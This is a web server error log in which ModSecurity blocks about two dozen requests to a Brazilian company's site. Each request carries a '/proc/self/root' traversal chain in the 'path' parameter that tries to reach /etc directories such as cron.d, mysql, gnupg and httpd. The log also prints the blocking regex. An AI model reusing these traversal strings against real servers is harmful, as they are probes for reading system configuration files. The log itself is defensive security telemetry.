[Wed Mar 18 11:12:36.905466 2026] [:error] [pid 30077:tid 140411733534464] [client 74.7.243.128:37668] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqy1Pu8EFLIOrSqIpsIxwAAAkE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:12:38.271881 2026] [:error] [pid 26799:tid 140411666392832] [client 74.7.243.128:37678] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqy1ta6ubjKNq_cu4afWQAAA0k"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:12:39.771514 2026] [:error] [pid 31803:tid 140411632822016] [client 74.7.243.128:40870] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqy1-yqAr6etmhZHNrFtAAAAE0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:12:41.007722 2026] [:error] [pid 15826:tid 140411733534464] [client 74.7.243.128:40882] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqy2eoXxyEfFpUF8f9yQAAAAUE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:12:42.380627 2026] [:error] [pid 17887:tid 140411733534464] [client 74.7.243.128:40888] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqy2gkwaGbbGflqUZAU1wAAAME"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:12:43.671679 2026] [:error] [pid 11816:tid 140411691570944] [client 74.7.243.128:40896] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqy2-w_le52K8_3pV3kggAAAgY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:12:45.091538 2026] [:error] [pid 26799:tid 140411741927168] [client 74.7.243.128:40904] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqy3da6ubjKNq_cu4afXwAAA0A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:12:46.429476 2026] [:error] [pid 17653:tid 140411540502272] [client 74.7.243.128:40920] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqy3sdf6f5d65gmYZTaVgAAAtg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:12:47.813316 2026] [:error] [pid 26799:tid 140411683178240] [client 74.7.243.128:40922] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqy39a6ubjKNq_cu4afZAAAA0c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:12:54.144047 2026] [:error] [pid 26799:tid 140411616036608] [client 74.7.243.128:40934] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqy5da6ubjKNq_cu4afaQAAA08"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:12:57.057314 2026] [:error] [pid 30077:tid 140411557287680] [client 74.7.243.128:40634] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqy6fu8EFLIOrSqIpsI3gAAAlY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:12:58.370005 2026] [:error] [pid 31803:tid 140411590858496] [client 74.7.243.128:40648] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqy6uyqAr6etmhZHNrFwAAAAFI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:13:00.914737 2026] [:error] [pid 15051:tid 140411716749056] [client 74.7.243.128:54338] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqy6ymAPhZkrhU8w4lybAAAAIM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:13:03.787000 2026] [:error] [pid 31803:tid 140411699963648] [client 74.7.243.128:54350] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqy7-yqAr6etmhZHNrFwwAAAEU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:13:06.143358 2026] [:error] [pid 30077:tid 140411716749056] [client 74.7.243.128:54360] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqy8fu8EFLIOrSqIpsI4AAAAkM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:13:07.472239 2026] [:error] [pid 19507:tid 140411548894976] [client 74.7.243.128:54368] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqy89Y0UrI5A3LftIyxrwAAAZc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:13:09.906473 2026] [:error] [pid 15051:tid 140411649607424] [client 74.7.243.128:54374] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqy9SmAPhZkrhU8w4lyigAAAIs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:13:12.591903 2026] [:error] [pid 15051:tid 140411565680384] [client 74.7.243.128:54374] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqy-CmAPhZkrhU8w4lylAAAAJU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:13:16.002923 2026] [:error] [pid 31803:tid 140411658000128] [client 74.7.243.128:44562] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqy--yqAr6etmhZHNrFzAAAAEo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:13:22.963393 2026] [:error] [pid 15826:tid 140411557287680] [client 74.7.241.31:55854] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqzAuoXxyEfFpUF8f9yZAAAAVY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:13:24.076922 2026] [:error] [pid 30077:tid 140411616036608] [client 74.7.243.128:44570] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqzBPu8EFLIOrSqIpsI9gAAAk8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:13:25.350196 2026] [:error] [pid 11816:tid 140411691570944] [client 74.7.243.128:36436] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqzBew_le52K8_3pV3kowAAAgY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
